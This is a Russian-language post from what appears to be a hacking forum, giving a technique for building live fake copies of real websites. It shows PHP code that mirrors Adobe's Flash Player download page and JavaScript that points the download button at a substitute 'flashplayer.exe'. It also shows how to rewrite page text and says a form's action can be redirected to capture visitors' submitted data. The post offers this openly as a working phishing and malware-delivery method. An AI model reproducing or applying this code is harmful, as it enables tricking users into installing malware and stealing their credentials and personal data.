• XSS.stack #1 – первый литературный журнал от юзеров форума

Технология разработки фейков

pw0ned

лучик света в грозовом небе
Забанен
Регистрация
27.12.2018
Сообщения
203
Реакции
99
Пожалуйста, обратите внимание, что пользователь заблокирован
Тема старая, но до сих пор рабочая.
Опубликована мной на экспе ещё в 2к17.

Информация может и не новая для кого либо, но я давно был заинтересован подобной подделкой.
Сменилась информация на основном сайте ? - Меняется информация и на нашем фейке.

Хотим сделать фейк обновления Flash Player, пишем следующий код:

PHP:
<?php

$flash = file_get_contents ('https://get.adobe.com/flashplayer/'); //получаем страницу офф.сайта
echo $flash;

?>

<script type="text/javascript">
document.getElementById("buttonDownload").href="flashplayer.exe";
</script>

До того как мы заюзали js, наша кнопка для скачивания плеера имела совсем другую ссылку, после того как мы использовали код который выше, ссылка на кнопке сменилась на "flashplayer.exe".

Прошу заметить что наш фейк работает в режиме онлайн, функция file_get_contents парсит всю информацию с настоящего сайта, и только потом мы с помощью js меняем что нам нужно.

Скриншот: https://image.prntscr.com/image/DAshcsbIRm2MOZzfUV8MaA.png

Тот же текст на нашей странице можно менять следующим методом:

JavaScript:
document.body.innerHTML = document.body.innerHTML.replace('Что нужно заменить', 'На что заменить');


Скриншот: https://image.prntscr.com/image/_qEQLDIRSeSVNWgnyqPLrw.png

Таким же макаром можно менять и action формы для вставки обработчика и получения чужих данных с формы.

Что-то подобное:

JavaScript:
document.getElementById('form-id').attributes.action.value
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх